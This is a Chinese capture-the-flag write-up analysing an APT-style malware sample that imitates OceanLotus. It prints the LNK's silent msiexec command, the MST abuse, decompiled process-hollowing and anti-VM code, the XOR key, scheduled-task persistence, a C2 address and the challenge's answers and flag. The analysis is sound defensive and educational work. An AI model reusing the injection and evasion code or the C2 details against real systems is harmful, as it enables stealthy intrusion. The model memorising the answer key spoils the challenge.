网站seo排名培训wordpress调用分类名
张小明 2026/1/1 10:49:00
网站seo排名培训,wordpress调用分类名,做网站公司凡科,住房和城乡建设管理局官网病毒分析
注1#xff1a;本题通过模仿某近期活跃的APT#xff08;Advanced Presistent Threat#xff0c;高级持续性威胁#xff09;组织的攻击手法#xff0c;使题目更符合真实环境#xff0c;题目设计为不会对系统进行破坏#xff0c;即使真机运行也不影响#xff0…病毒分析注1本题通过模仿某近期活跃的APTAdvanced Presistent Threat高级持续性威胁组织的攻击手法使题目更符合真实环境题目设计为不会对系统进行破坏即使真机运行也不影响清除方法将在官方wp中给出注2为使题目正常运行请将文件解压到C:\Windows\System32中注3本系列除最后一题外其他题目均为问答不需要包裹ISCTF{}学习https://crystal.stellalyr.ink/2025/12/03/ISCTF-2025-Virus-Analysis/https://huoya.work/bk/index.php/archives/553/Q1模仿的APT组织中文代号海莲花Q2第一阶段载荷的入口文件全名ISCTF基础规则说明文档.pdf.lnkQ3第一阶段中带数字签名文件的签名者名称Zoom Video Communications, Inc.Q4第一阶段恶意载荷释放的三个文件名ISCTF2025基础规则说明文档.pdfzRCAppCore.dllzRC.datQ5第二阶段白加黑技巧中的黑文件名zRCAppCore.dllQ6第二阶段对下一阶段载荷的保护算法xorQ7第二阶段对下一阶段载荷的保护密码tf7*TV8uQ8第三阶段载荷使用的开源保护工具upxQ9第三阶段载荷首次回连域名colonised-my.sharepoint.comQ10第三阶段载荷获取命令的回连地址47.252.28.78:37204Q11第三阶段载荷获取命令时发送的内容get_cmdQ12访问最终回连地址得到的flagISCTF{Wow!_Y0u_F0uNd_C2_AdDr3sssss!}前言1. 完整攻击流程LNK文件 → msiexec执行 → MSIMST静默安装 → 释放payload.dll → 执行Utils() → 释放PDF诱饵 zRCAppCore.dll zRC.dat → Zoom组件加载zRCAppCore.dll → XOR解密zRC.dat → 进程空洞化注入dllhost.exe → 解密PE执行 → 反虚拟机检测 → 回连SharePoint域名 → 获取C2配置 → 连接真实C2 (47.252.28.78:37204) → 发送get_cmd → 获取flag2. 技术特点伪装技巧利用合法Zoom签名、诱饵PDF、静默安装持久化通过MSI安装机制实现防御规避白加黑侧载、进程空洞化、UPX加壳、反虚拟机检测数据保护XOR加密、自定义Base64编码网络通信多阶段C2使用SharePoint作为中间节点Stage 0入口文件与执行链分析1. 文件概览解压附件后能看到三个文件ISCTF基础规则说明文档.pdf.lnkTJe1wfR6Wl其中TJe1w与fR6Wl设置了隐藏属性而 Windows 资源管理器对.lnk的显示默认不展示扩展名。于是用户界面上看起来很像只有一个“PDF 文件”实际点击的是快捷方式属于典型的社会工程入口Tje1w是MSI 安装包白文件壳fR6Wl实际是MST Transform黑文件负责修改 MSI 行为搜一下APT MSI病毒https://ti.qianxin.com/blog/articles/new%20-trend-in-msi-file-abuse-new-oceanlotus-group-first-to-use-mst-files-to-deliver-special-trojan-cn/2. 执行命令分析右键查看该.lnk属性目标命令为C:\Windows\System32\msiexec.exe /i Tje1w TRANSFORMSfR6Wl /qn解释一下参数含义这一步非常关键msiexec.exeWindows Installer 引擎系统自带、外观“可信”/i Tje1w安装一个 MSI这里用无扩展名混淆TRANSFORMSfR6Wl安装时应用 MST 变换文件重点恶意点通常在 Transform/qnQuiet No UI静默安装用户无感到这里我们就能判断不是“某个 exe 在干坏事”而是“安装流程被恶意改写”3. 数字签名验证使用Sigcheck工具检查签名C:\Windows\System32\ISCTFC:\Windows\System32\Sigcheck\sigcheck.exe -q C:\Windows\System32\ISCTF\* Sigcheck v2.90 - File version and signature viewer Copyright (C) 2004-2022 Mark Russinovich Sysinternals - www.sysinternals.com c:\windows\system32\isctf\fR6Wl: Verified: Unsigned File date: 19:54 2025/12/1 Publisher: n/a Company: n/a Description: n/a Product: n/a Prod version: n/a File version: n/a MachineType: n/a c:\windows\system32\isctf\ISCTF????????.pdf.lnk: Verified: Unsigned File date: 20:56 2025/12/1 Publisher: n/a Company: n/a Description: n/a Product: n/a Prod version: n/a File version: n/a MachineType: n/a c:\windows\system32\isctf\TJe1w: Verified: Signed Signing date: 14:29 2025/6/11 Publisher: Zoom Video Communications, Inc. Company: n/a Description: n/a Product: n/a Prod version: n/a File version: n/a MachineType: n/a或者结果Tjelw.msi由Zoom Video Communications, Inc.签名fR6Wl.mst无签名4. MSI/MST Abuse打开压缩包先比对一下两个文件重命名便于表述Tje1w→base.msifR6Wl→evil.mstOrca 打开base.msihttps://developer.microsoft.com/zh-cn/windows/downloads/windows-sdk/安装时只需选 MSI Tools 就能拿到 Orca.msiTips Orca 是 32 位程序它访问C:\Windows\System32时会被系统重定向到C:\Windows\SysWOW64报「路径不存在」需要把那两个文件放弃地方再拖进去考虑到一般白黑的攻击策略.msi文件通常是正常的白文件。在本题中base.msi是Zoom Remote Control Installer是合法的 Zoom 安装包。我们确信「白」不会对 Windows 造成危害那么「黑」.mst所做出的更改则需要加以关注3.菜单Transform→Apply Transform...→ 选择evil.mst4.重点观察变化的表Tables4 个表发生了更改4.1Binary表【掩藏二进制文件的地方一般用于存储 Payload】多了一个zTool新增行Name zToolData [Binary Data]含义变换文件往Binary 表里加了一段二进制流名字叫zTool双击[Binary Data]后弹出窗口Edit Binary Stream后选择Action为Write binary to file并指定一个Filename即可将二进制数据保存下来。我们将其存为Payloadida分析可以看到其实是Payload.dll[第一阶段恶意载荷]后面那个表也可以看出 为什么是 DLLCustomAction 的 Type 2305 0x900 1低位1指 “DLL stored in a Binary table stream”所以 Binary 里那坨就是 DLL4.2CustomAction 表新增RunTools动作新增行Action RunToolsSource zTool说明这条动作依赖 Binary 表里的zToolTarget Utils通常代表“调用 DLL 的导出函数名/或传入参数”结合后续 IDA 证实确实有Utils()Type 2305MSI 自定义动作类型位组合含义是定义一个名为RunTools的自定义动作源数据来自 Binary 表里的zTool目标参数是Utils通常会作为命令行参数传给 zTool表示执行 Utils 相关的任务/功能结论安装过程会加载 Binary 表里的 zToolDLL并执行目标 Utils4.3InstallExecuteSequence 表把 RunTools 插入安装流程解释这张表决定 MSI 安装过程“按什么顺序执行动作”一旦 RunTools 被插入zToolpayload.dll就会在安装某阶段被执行与/qn静默参数配合就实现“后台执行恶意动作”到此MSI/MST 注入链路已经闭环Transform 改表 → Binary 藏 DLL → CustomAction 调 Utils → Sequence 决定触发时机4.4 File 表落地文件条目zRCAppCore.dll / zRC.dat 等在 File 表看到可疑条目ZRC.DLL|zRC...以及zRC.dat解释File 表列出“安装时要落地到磁盘”的文件这里的条目与后续 IDA 代码拼接的落地点一致ZoomRemoteControl\bin\...这表明恶意链不仅在 Binary 表执行 DLL还会把后续阶段文件写到特定目录Stage 1payload.dllzTool分析ida分析Payload.dll搜Utils函数int Utils() // CustomAction的目标函数 { sub_10001E70(); // 释放并打开诱饵PDF sub_10002230(); // 释放并打开诱饵PDF sub_10002530(); // 释放zRC.dat return 0; }1.释放诱饵PDFsub_10001E70HRSRC __usercall sub_10001E70eax(int a1ebp) { HRSRC hResInfo; // eax HRSRC hResInfo_1; // edi HGLOBAL hResData; // esi DWORD v4; // edi LPVOID v5; // esi int *n2147483646; // eax int v7; // edx int *v8; // eax _BYTE *v9; // edx __int128 *p_p_lpFile; // eax const WCHAR *lpFile; // eax void *p_lpFile_2; // edx int v13; // ecx int v14; // [esp-31Ch] [ebp-32Ch] int v15; // [esp-318h] [ebp-328h] int v16; // [esp-314h] [ebp-324h] _BYTE *v17; // [esp-300h] [ebp-310h] unsigned int n7; // [esp-2ECh] [ebp-2FCh] _BYTE v19[4]; // [esp-2E8h] [ebp-2F8h] int v20; // [esp-2E4h] [ebp-2F4h] BYREF int v21; // [esp-2E0h] [ebp-2F0h] BYREF void **p_??_7ios_basestd6B; // [esp-27Ch] [ebp-28Ch] BYREF __int128 p_lpFile_1; // [esp-234h] [ebp-244h] BYREF __int64 v24; // [esp-224h] [ebp-234h] WCHAR pszPath_[264]; // [esp-21Ch] [ebp-22Ch] BYREF int *v26; // [esp-Ch] [ebp-1Ch] struct _EXCEPTION_REGISTRATION_RECORD *ExceptionList; // [esp-8h] [ebp-18h] void *v28; // [esp-4h] [ebp-14h] int v29; // [esp0h] [ebp-10h] int v30; // [esp4h] [ebp-Ch] void *v31; // [esp8h] [ebp-8h] int v32; // [espCh] [ebp-4h] BYREF void *retaddr; // [esp10h] [ebp0h] v30 a1; v31 retaddr; v29 -1; v28 loc_1001D986; ExceptionList NtCurrentTeb()-NtTib.ExceptionList; v26 v32; hResInfo FindResourceW(hModule, (LPCWSTR)0x65, LPDF); hResInfo_1 hResInfo; if ( hResInfo ) { hResData LoadResource(hModule, hResInfo); v4 SizeofResource(hModule, hResInfo_1); v5 LockResource(hResData); SHGetFolderPathW(0, 5, 0, 0, pszPath_); n2147483646 (int *)sub_100028D0(pszPath_); v29 0; v8 sub_10004CD0(n2147483646, v7, aIsctf2025, 0x16u); v24 0; p_lpFile_1 0; p_lpFile_1 *(_OWORD *)v8; v24 *((_QWORD *)v8 2); v8[4] 0; v8[5] 7; *(_WORD *)v8 0; LOBYTE(v29) 2; if ( n7 7 ) { v9 v17; if ( 2 * n7 2 0x1000 ) { v9 (_BYTE *)*((_DWORD *)v17 - 1); if ( (unsigned int)(v17 - v9 - 4) 0x1F ) { sub_1000A8D1(2 * n7 37, 0, 0, 0, 0, 0); goto LABEL_18; } } sub_10005E9C(v9); } sub_10007A70(v20, 0, 176); p_p_lpFile p_lpFile_1; if ( HIDWORD(v24) 7 ) p_p_lpFile (__int128 *)p_lpFile_1; sub_10004160(p_p_lpFile, v14, v15, v16); *(int *)((char *)v20 *(_DWORD *)(v20 4)) (int)std::ofstream::vftable; *(_DWORD *)v19[*(_DWORD *)(v20 4)] *(_DWORD *)(v20 4) - 104; LOBYTE(v29) 3; sub_100036F0(v5, v4, 0); if ( !sub_10004670(v21) ) sub_10001D10( *(int *)((char *)v20 *(_DWORD *)(v20 4) 12) | (4 * (*(int *)((char *)v20 *(_DWORD *)(v20 4) 56) 0) 2), 0); lpFile (const WCHAR *)p_lpFile_1; if ( HIDWORD(v24) 7 ) lpFile (const WCHAR *)p_lpFile_1; ShellExecuteW(0, Lopen, lpFile, 0, 0, 1); *(int *)((char *)v20 *(_DWORD *)(v20 4)) (int)std::ofstream::vftable; *(_DWORD *)v19[*(_DWORD *)(v20 4)] *(_DWORD *)(v20 4) - 104; sub_10003640(); *(int *)((char *)v20 *(_DWORD *)(v20 4)) (int)std::ostream::vftable; *(_DWORD *)v19[*(_DWORD *)(v20 4)] *(_DWORD *)(v20 4) - 8; LOBYTE(v29) 4; p_??_7ios_basestd6B std::ios_base::vftable; hResInfo (HRSRC)sub_10005A57(p_??_7ios_basestd6B); if ( HIDWORD(v24) 7 ) { p_lpFile_2 (void *)p_lpFile_1; if ( (unsigned int)(2 * HIDWORD(v24) 2) 0x1000 ) return (HRSRC)sub_10005E9C(p_lpFile_2); p_lpFile_2 *(void **)(p_lpFile_1 - 4); v13 2 * HIDWORD(v24) 37; if ( (unsigned int)(p_lpFile_1 - (_DWORD)p_lpFile_2 - 4) 0x1F ) return (HRSRC)sub_10005E9C(p_lpFile_2); LABEL_18: sub_1000A8D1(v13, 0, 0, 0, 0, 0); JUMPOUT(0x10002194); } } return hResInfo; }.rdata:10027560 ; const wchar_t aIsctf2025[] .rdata:10027560 aIsctf2025: ; DATA XREF: sub_10001E70AE↑o .rdata:10027560 text UTF-16LE, \ISCTF2025 .rdata:10027574 db 0FAh .rdata:10027575 db 57h ; W .rdata:10027576 db 40h ; .rdata:10027577 db 78h ; x .rdata:10027578 db 0C4h .rdata:10027579 db 89h .rdata:1002757A db 19h .rdata:1002757B db 52h ; R .rdata:1002757C db 0F4h .rdata:1002757D db 8Bh .rdata:1002757E db 0Eh .rdata:1002757F db 66h ; f .rdata:10027580 db 87h .rdata:10027581 db 65h ; e .rdata:10027582 db 63h ; c .rdata:10027583 db 68h ; h .rdata:10027584 db 2Eh ; . .rdata:10027585 db 0 .rdata:10027586 db 70h ; p .rdata:10027587 db 0 .rdata:10027588 db 64h ; d .rdata:10027589 db 0 .rdata:1002758A db 66h ; f从资源区类型PDF, ID 0x65读取PDF内容保存到%USERPROFILE%\Documents\ISCTF2025基础规则说明文档.pdf使用ShellExecuteW打开PDF作为社会工程学诱饵2. 释放黑DLLsub_10002230从资源区类型DLL, ID 0x66读取DLL数据保存到C:\Program Files (x86)\ZoomRemoteControl\bin\zRCAppCore.dll为第二阶段白加黑攻击做准备3.释放加密载荷sub_10002530从资源区类型SC, ID 0x67读取加密数据保存到C:\Program Files (x86)\ZoomRemoteControl\bin\zRC.dat包含第三阶段的加密PE载荷Stage 2zRCAppCore.dll分析与进程注入根据前文我们在Resource Hacker中加载payload.dll并从中提取出我们所需的两个文件其一为DLL中ID为102的zRCAppCore.dll另一为SC中ID为103的zRC.dat右键---Save .bin resource...1. DLL入口与恶意代码触发BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { if ( fdwReason 1 ) sub_100018BE(); return sub_100015F2(hinstDLL, fdwReason, lpReserved); }int __cdecl sub_100015F2(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { void *lpReserved_1; // ebx int v5; // esi int v6; // eax if ( !fdwReason dword_1001B908 0 ) return 0; if ( fdwReason ! 1 fdwReason ! 2 ) { lpReserved_1 lpReserved; LABEL_9: v6 sub_100013B0(hinstDLL, fdwReason, lpReserved_1); v5 v6; if ( fdwReason 1 !v6 ) { sub_100013B0(hinstDLL, 0, lpReserved_1); sub_1000153B(lpReserved_1 ! 0); sub_10001700(hinstDLL, 0, lpReserved_1); } if ( !fdwReason || fdwReason 3 ) { v5 sub_100013DE(hinstDLL, fdwReason, lpReserved_1); if ( v5 ) return sub_10001700(hinstDLL, fdwReason, lpReserved_1); } return v5; } lpReserved_1 lpReserved; v5 sub_10001700(hinstDLL, fdwReason, lpReserved); if ( v5 ) { v5 sub_100013DE(hinstDLL, fdwReason, lpReserved); if ( v5 ) goto LABEL_9; } return v5; }fdwReason 1PROCESS_ATTACH时会走 B 分支最后goto LABEL_9LABEL_9里会调用sub_100013B0sub_100013B0才是恶意主逻辑入口触发 hollowing 那个sub_10001050int __stdcall sub_100013B0(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { if ( fdwReason 1 ) { sub_10001050(); ExitProcess(0); } return 1; }2. 文件读取与解密sub_10001050BOOL sub_10001050() { HMODULE hModule; // eax _BYTE *v1; // eax HANDLE hFile; // esi _DWORD *lpBuffer; // edi SIZE_T nNumberOfBytesToRead_1; // esi char *v5; // esi HMODULE hModule_1; // eax FARPROC NtUnmapViewOfSection; // eax LPVOID *v8; // edx void *lpBaseAddress; // eax int v10; // esi SIZE_T nSize; // [esp-8h] [ebp-688h] SIZE_T nNumberOfBytesToRead; // [esp8h] [ebp-678h] signed int nNumberOfBytesToReada; // [esp8h] [ebp-678h] char *v15; // [espCh] [ebp-674h] _PROCESS_INFORMATION ProcessInformation; // [esp10h] [ebp-670h] BYREF int Buffer; // [esp2Ch] [ebp-654h] BYREF CONTEXT Context; // [esp30h] [ebp-650h] BYREF DWORD NumberOfBytesRead; // [esp304h] [ebp-37Ch] BYREF _STARTUPINFOA StartupInfo; // [esp308h] [ebp-378h] BYREF _DWORD zRC.dat_[3]; // [esp354h] [ebp-32Ch] BYREF CHAR Filename[264]; // [esp360h] [ebp-320h] BYREF char v23[264]; // [esp468h] [ebp-218h] BYREF CHAR FileName[268]; // [esp570h] [ebp-110h] BYREF Context.ContextFlags 65543; memset(StartupInfo.lpReserved, 0, 40); ProcessInformation 0; StartupInfo.cb 68; StartupInfo.dwFlags 1; memset(StartupInfo.wShowWindow, 0, 20); hModule GetModuleHandleW(LzRCAppCore.dll); if ( GetModuleFileNameA(hModule, Filename, 0x104u) ) { v1 (_BYTE *)sub_10002120(Filename, 92); if ( v1 ) { *v1 0; sub_10006410(v23, 260, Filename); strcpy((char *)zRC.dat_, zRC.dat); sub_10001010(FileName, 260, %s\\%s, v23, (const char *)zRC.dat_); } } CreateProcessA(0, (LPSTR)C:\\Windows\\System32\\dllhost.exe, 0, 0, 0, 4u, 0, 0, StartupInfo, ProcessInformation); hFile CreateFileA(FileName, 0x80000000, 1u, 0, 3u, 0, 0); nNumberOfBytesToRead GetFileSize(hFile, 0); lpBuffer VirtualAlloc(0, nNumberOfBytesToRead, 0x3000u, 4u); ReadFile(hFile, lpBuffer, nNumberOfBytesToRead, NumberOfBytesRead, 0); CloseHandle(hFile); nNumberOfBytesToRead_1 0; strcpy((char *)zRC.dat_, tf7*TV8un); if ( nNumberOfBytesToRead ) { do { *((_BYTE *)lpBuffer nNumberOfBytesToRead_1) ^ *((_BYTE *)zRC.dat_ nNumberOfBytesToRead_1 % 9); nNumberOfBytesToRead_1; } while ( nNumberOfBytesToRead_1 nNumberOfBytesToRead ); } v5 (char *)lpBuffer lpBuffer[15]; v15 v5; GetThreadContext(ProcessInformation.hThread, Context); ReadProcessMemory(ProcessInformation.hProcess, (LPCVOID)(Context.Ebx 8), Buffer, 4u, 0); hModule_1 GetModuleHandleA(ntdll.dll); NtUnmapViewOfSection GetProcAddress(hModule_1, NtUnmapViewOfSection); v8 (LPVOID *)(v5 52); if ( Buffer *((_DWORD *)v5 13) ) { ((void (__stdcall *)(HANDLE, int))NtUnmapViewOfSection)(ProcessInformation.hProcess, Buffer); v8 (LPVOID *)(v5 52); } lpBaseAddress VirtualAllocEx(ProcessInformation.hProcess, *v8, *((_DWORD *)v5 20), 0x3000u, 0x40u); nSize *((_DWORD *)v5 21); zRC.dat_[0] lpBaseAddress; WriteProcessMemory(ProcessInformation.hProcess, lpBaseAddress, lpBuffer, nSize, 0); nNumberOfBytesToReada 0; if ( *((_WORD *)v5 3) ) { v10 0; do { WriteProcessMemory( ProcessInformation.hProcess, (LPVOID)(zRC.dat_[0] *(_DWORD *)((char *)lpBuffer[v10 65] lpBuffer[15])), (char *)lpBuffer *(_DWORD *)((char *)lpBuffer[v10 67] lpBuffer[15]), *(_DWORD *)((char *)lpBuffer[v10 66] lpBuffer[15]), 0); v10 10; nNumberOfBytesToReada; } while ( nNumberOfBytesToReada *((unsigned __int16 *)v15 3) ); v5 v15; } Context.Eax zRC.dat_[0] *((_DWORD *)v5 10); WriteProcessMemory(ProcessInformation.hProcess, (LPVOID)(Context.Ebx 8), v5 52, 4u, 0); SetThreadContext(ProcessInformation.hThread, Context); ResumeThread(ProcessInformation.hThread); CloseHandle(ProcessInformation.hThread); return CloseHandle(ProcessInformation.hProcess); }实现了“读取 zRC.dat → XOR 解密 → 创建挂起 dllhost.exe → NtUnmapViewOfSection 挖空 → VirtualAllocEx/WriteProcessMemory 写入新 PE → SetThreadContext 改入口点 → ResumeThread 执行”的完整 Process Hollowing 注入链2.1 定位zRC.datGetModuleFileNameA(hModule, Filename, 0x104u); // 获取自身路径 // 构造zRC.dat完整路径...\ZoomRemoteControl\bin\zRC.dat2.2 XOR解密算法strcpy((char *)zRC.dat_, tf7*TV8un); // 密钥 for (i 0; i nNumberOfBytesToRead; i) { ((BYTE*)lpBuffer)[i] ^ ((BYTE*)zRC.dat_)[i % 9]; // 循环XOR }算法XOR异或密钥tf7*TV8u实际使用前9字节3. 进程空洞化注入Process Hollowing3.1 创建挂起进程CreateProcessA(0, C:\\Windows\\System32\\dllhost.exe, ..., CREATE_SUSPENDED, ...);3.2 获取目标进程上下文GetThreadContext(hThread, Context); ReadProcessMemory(hProcess, (LPCVOID)(Context.Ebx 8), ImageBase, 4, 0);3.3 卸载原映像NtUnmapViewOfSection GetProcAddress(GetModuleHandleA(ntdll.dll), NtUnmapViewOfSection); NtUnmapViewOfSection(hProcess, ImageBase);3.4 注入恶意PE// 分配内存 lpBaseAddress VirtualAllocEx(hProcess, NewImageBase, SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // 写入PE头和节区 WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, SizeOfHeaders, 0); for (每个节区) { WriteProcessMemory(hProcess, NewBase VirtualAddress, lpBuffer PointerToRawData, SizeOfRawData, 0); } // 修改线程上下文 Context.Eax NewBase AddressOfEntryPoint; WriteProcessMemory(hProcess, (LPVOID)(Context.Ebx 8), NewBase, 4, 0); SetThreadContext(hThread, Context); // 恢复执行 ResumeThread(hThread);Stage 3zRC.dat解密载荷分析1. 解密与脱壳1.1 解密脚本def decrypt_payload(): with open(zRC.dat, rb) as f: data bytearray(f.read()) # 密钥字符串 key_str tf7*TV8un # 根据 IDA 代码nNumberOfBytesToRead_1 % 9 # 意味着循环使用密钥的前 9 个字节 key_len 9 print(f[*] 开始解密文件大小: {len(data)} 字节) print(f[*] 使用密钥: {key_str[:key_len]}) for i in range(len(data)): data[i] ^ ord(key_str[i % key_len]) # 保存解密后的文件 output_filename zRC_decrypted.bin # 既然注入到 dllhost.exe大概率是个 EXE with open(output_filename, wb) as f: f.write(data) print(f[] 解密完成已保存为: {output_filename}) # 简单检查一下文件头 if data[:2] bMZ: print([] 文件头检测: MZ (这是一个 PE 文件)) else: print(f[-] 文件头检测: {data[:2]} (可能不是 PE 文件或者是 Shellcode)) if __name__ __main__: decrypt_payload() C:\ISCTF_dumpC:\Environment\Python38\python.exe c:/ISCTF_dump/1.py [*] 开始解密文件大小: 80384 字节 [*] 使用密钥: tf7*TV8u [] 解密完成已保存为: zRC_decrypted.bin [] 文件头检测: MZ (这是一个 PE 文件) 1.2 UPX脱壳upx -d zRc_decrypted.bin Ultimate Packer for eXecutables Copyright (C) 1996 - 2025 UPX 5.0.2 Markus Oberhumer, Laszlo Molnar John Reiser Jul 20th 2025 File size Ratio Format Name -------------------- ------ ----------- ----------- 173056 - 80384 46.45% win32/pe zRc_decrypted.bin Unpacked 1 file.2. 反虚拟机检测ida分析zRc_decrypted.binint start() { sub_406FB2(); return sub_4067E7(); }int __usercall sub_4067E7eax(UINT uExitCode_1esi) { char v1; // bl _DWORD *v3; // eax _DWORD *v4; // esi _DWORD *v5; // eax _DWORD *v6; // esi int v7; // edi int v8; // esi _DWORD *v9; // eax char v10; // [esp10h] [ebp-24h] UINT uExitCode; // [esp14h] [ebp-20h] if ( !(unsigned __int8)sub_406509(1) || (v1 0, v10 sub_4064D7(), n2 1) ) { sub_406D55(7); goto LABEL_19; } if ( n2 ) { v1 1; } else { n2 1; if ( sub_40DDE1(unk_41C1E0, unk_41C200) ) return 255; sub_40DDB6(unk_41C1BC, unk_41C1DC); n2 2; } sub_406660(v10); v3 (_DWORD *)sub_407062(); v4 v3; if ( *v3 (unsigned __int8)sub_4065C9(v3) ) ((void (__thiscall *)(_DWORD, _DWORD, int, _DWORD))*v4)(*v4, 0, 2, 0); v5 (_DWORD *)sub_407068(); v6 v5; if ( *v5 (unsigned __int8)sub_4065C9(v5) ) sub_40D266(*v6); v7 sub_40D854(); v8 *(_DWORD *)sub_40DE6B(); v9 (_DWORD *)sub_40DE65(); uExitCode_1 sub_402B60(*v9, v8, v7); if ( !(unsigned __int8)sub_406E6F() ) { LABEL_19: sub_40D28C(uExitCode_1); sub_40D250(uExitCode); __debugbreak(); } if ( !v1 ) sub_40D241(); sub_40667D(1, 0); return uExitCode_1; }sub_4067E7是程序的 CRT 启动包装函数负责一次性运行库初始化通过全局状态n2防止重入、注册退出/异常回调随后以类似main(argc, argv, envp)的形式调用真正主逻辑sub_402B60int sub_402B60() { int v6; // eax ULONGLONG TickCount64; // kr00_8 ULONGLONG v8; // rax bool v9; // cf ULONGLONG n0x1388; // rax SHELLEXECUTEINFOW SystemInfo; // [esp24h] [ebp-6CCh] BYREF SHELLEXECUTEINFOW pExecInfo; // [esp60h] [ebp-690h] BYREF HKEY phkResult; // [esp9Ch] [ebp-654h] BYREF _MEMORYSTATUSEX Buffer; // [espA0h] [ebp-650h] BYREF DWORD cbData[3]; // [espE8h] [ebp-608h] BYREF char v18; // [espF4h] [ebp-5FCh] WCHAR Data[260]; // [espF8h] [ebp-5F8h] BYREF _OWORD v20[4]; // [esp300h] [ebp-3F0h] BYREF __int16 v21; // [esp340h] [ebp-3B0h] _BYTE v22[938]; // [esp342h] [ebp-3AEh] BYREF _EAX 0; __asm { cpuid } cbData[0] _EBX; cbData[1] _EDX; cbData[2] _ECX; v18 0; if ( sub_407730(cbData, VMware) || sub_407730(cbData, VBox) || sub_407730(cbData, KVM) || sub_407730(cbData, Microsoft Hv) || sub_407730(cbData, Xen) ) { return 0; } cbData[0] 256; if ( !RegOpenKeyExA(HKEY_LOCAL_MACHINE, HARDWARE\\DESCRIPTION\\System\\BIOS, 0, 0x20019u, phkResult) ) { if ( !RegQueryValueExA(phkResult, SystemProductName, 0, 0, (LPBYTE)Data, cbData) (sub_407730(Data, Virtual) || sub_407730(Data, VMware) || sub_407730(Data, VBox) || sub_407730(Data, Hyper-V) || sub_407730(Data, Cloud)) ) { v6 0; goto LABEL_19; } RegCloseKey(phkResult); } v6 1; LABEL_19: if ( v6 ) { Buffer.dwLength 64; GlobalMemoryStatusEx(Buffer); if ( HIDWORD(Buffer.ullTotalPhys) 2 ) { GetSystemInfo((LPSYSTEM_INFO)SystemInfo); if ( SystemInfo.lpParameters (LPCWSTR)4 ) { TickCount64 GetTickCount64(); cbData[0] HIDWORD(TickCount64); Sleep(0x1388u); v8 GetTickCount64(); v9 v8 __PAIR64__(cbData[0], TickCount64); n0x1388 v8 - __PAIR64__(cbData[0], TickCount64); if ( HIDWORD(n0x1388) || !v9 (unsigned int)n0x1388 0x1388 ) { SystemInfo.cbSize 60; SystemInfo.fMask 64; SystemInfo.hwnd 0; SystemInfo.lpVerb Lopen; SystemInfo.lpFile Lschtasks; SystemInfo.lpParameters L/query /tn ZoomUpdater; memset(SystemInfo.lpDirectory, 0, 36); phkResult 0; if ( ShellExecuteExW(SystemInfo) SystemInfo.hProcess ) { WaitForSingleObject(SystemInfo.hProcess, 0xFFFFFFFF); GetExitCodeProcess(SystemInfo.hProcess, (LPDWORD)phkResult); CloseHandle(SystemInfo.hProcess); } if ( phkResult ) { SHGetFolderPathW(0, 42, 0, 0, Data); sub_40AEF0(Data, 260, L\\ZoomRemoteControl\\bin\\ZoomRemoteControl.exe); v21 0; v20[0] xmmword_4258D8; v20[1] xmmword_4258E8; v20[2] xmmword_4258F8; v20[3] xmmword_425908; sub_407F20(v22, 0, 934); LODWORD(Buffer.ullAvailExtendedVirtual) 77; *(_OWORD *)Buffer.dwLength xmmword_42591C; *(_OWORD *)Buffer.ullAvailPhys xmmword_42592C; *(_OWORD *)Buffer.ullAvailPageFile xmmword_42593C; Buffer.ullAvailVirtual 0x45005400530059LL; sub_40AEF0(v20, 500, Data); sub_40AEF0(v20, 500, Buffer); pExecInfo.cbSize 60; pExecInfo.lpParameters (LPCWSTR)v20; pExecInfo.fMask 64; pExecInfo.hwnd 0; pExecInfo.lpVerb Lopen; pExecInfo.lpFile Lschtasks; memset(pExecInfo.lpDirectory, 0, 36); ShellExecuteExW(pExecInfo); } sub_402450(); } } } } return 0; }包含多种反虚拟机/沙箱检测CPUID检查检测VMware、VirtualBox、KVM、Hyper-V、Xen等BIOS信息检查查询系统产品名称检测虚拟化关键词内存检查确保物理内存大于2GBCPU核心数检查至少4个逻辑处理器时间差检测检查Sleep(5000)前后的时间差检测沙箱加速sub_402B60先通过 CPUID/BIOS 注册表关键字进行反虚拟机检测再设置内存/CPU/睡眠时间差等沙箱门槛通过schtasks /query判断是否已持久化必要时创建名为ZoomUpdater的计划任务随后进入sub_402450执行 C2 配置获取与通信3. 网络通信分析int __usercall sub_402450eax(int a1ebp) { void *hRequest; // edi BOOL v2; // eax char *lpBuffer; // esi unsigned int v4; // edi __int128 *v5; // esi char *v6; // esi int v7; // eax unsigned int i; // ecx _DWORD *v9; // eax _BYTE *v10; // edx unsigned int v11; // ecx _BYTE *v12; // edx void *v13; // edx unsigned int n0xF_5; // ecx void *v15; // edx int v16; // esi _DWORD *hSession_1; // esi _DWORD *v18; // edi int s; // esi const CHAR *pszAddrString; // eax void *v21; // edx unsigned int v22; // ecx _BYTE *v23; // edx void *v24; // edx const char *buf; // eax void *buf_2; // edx _BYTE *v28; // [esp0h] [ebp-2ACh] unsigned int n0xF_2; // [esp14h] [ebp-298h] _BYTE *v30; // [esp18h] [ebp-294h] unsigned int n0xF_1; // [esp2Ch] [ebp-280h] __int128 v32; // [esp30h] [ebp-27Ch] BYREF int v33; // [esp40h] [ebp-26Ch] unsigned int n0xF_4; // [esp44h] [ebp-268h] __int128 v35; // [esp48h] [ebp-264h] BYREF int v36; // [esp58h] [ebp-254h] unsigned int n0xF_3; // [esp5Ch] [ebp-250h] int v38; // [esp60h] [ebp-24Ch] void *hRequest_1; // [esp64h] [ebp-248h] char *lpBuffer_1; // [esp68h] [ebp-244h] HINTERNET hConnect; // [esp6Ch] [ebp-240h] _DWORD *hSession; // [esp70h] [ebp-23Ch] BYREF DWORD lpdwNumberOfBytesAvailable_; // [esp74h] [ebp-238h] BYREF struct WSAData lpWSAData_; // [esp78h] [ebp-234h] BYREF struct sockaddr name_; // [esp20Ch] [ebp-A0h] BYREF _DWORD v46[5]; // [esp21Ch] [ebp-90h] BYREF unsigned int n0xF_6; // [esp230h] [ebp-7Ch] _DWORD *v48; // [esp234h] [ebp-78h] BYREF unsigned int v49; // [esp244h] [ebp-68h] unsigned int n0xF; // [esp248h] [ebp-64h] DWORD lpdwNumberOfBytesRead_; // [esp24Ch] [ebp-60h] BYREF __int128 v52; // [esp250h] [ebp-5Ch] BYREF int v53; // [esp260h] [ebp-4Ch] unsigned int n15; // [esp264h] [ebp-48h] __int128 buf_1; // [esp268h] [ebp-44h] BYREF int len; // [esp278h] [ebp-34h] unsigned int n0xF_7; // [esp27Ch] [ebp-30h] 